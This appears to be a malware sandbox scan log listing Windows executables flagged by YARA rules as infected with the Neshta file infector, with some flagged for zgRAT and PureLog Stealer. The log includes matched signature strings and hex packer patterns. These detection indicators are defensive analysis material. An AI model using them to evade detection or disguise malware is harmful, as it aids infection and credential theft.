C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Windows Defender\SearchIndexer.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Windows Defender\SearchIndexer.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Defender\SearchIndexer.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Defender\SearchIndexer.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\Au3Info.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\AutoIt3\Au3Info.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0x9f241:$s_packer1: file:/// 0x9f0c5:$s_packer2: {11111-22222-50001-00000} 0x9f253:$s_packer3: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0x9f337:$s_packer4: {11111-22222-40001-00001} 0x9f264:$s_packer_api1: 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 0x9f284:$s_packer_api2: 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 20 00 00 0B 41 00 6C 00 6C 00 6F 00 63 00 00 0x9f2a2:$s_packer_api3: 0D 57 00 72 00 69 00 74 00 65 00 20 00 00 11 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 20 00 00 0D 4D 00 65 00 6D 00 6F 00 72 00 79 00 00
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0x9f241:$s_packer1: file:/// 0x9f0c5:$s_packer2: {11111-22222-50001-00000} 0x9f253:$s_packer3: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0x9f337:$s_packer4: {11111-22222-40001-00001} 0x9f264:$s_packer_api1: 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 0x9f284:$s_packer_api2: 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 20 00 00 0B 41 00 6C 00 6C 00 6F 00 63 00 00 0x9f2a2:$s_packer_api3: 0D 57 00 72 00 69 00 74 00 65 00 20 00 00 11 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 20 00 00 0D 4D 00 65 00 6D 00 6F 00 72 00 79 00 00
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0x9f241:$s_packer1: file:/// 0x9f0c5:$s_packer2: {11111-22222-50001-00000} 0x9f253:$s_packer3: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ... 0x9f337:$s_packer4: {11111-22222-40001-00001} 0x9f264:$s_packer_api1: 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 0x9f284:$s_packer_api2: 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 20 00 00 0B 41 00 6C 00 6C 00 6F 00 63 00 00 0x9f2a2:$s_packer_api3: 0D 57 00 72 00 69 00 74 00 65 00 20 00 00 11 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 20 00 00 0D 4D 00 65 00 6D 00 6F 00 72 00 79 00 00
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
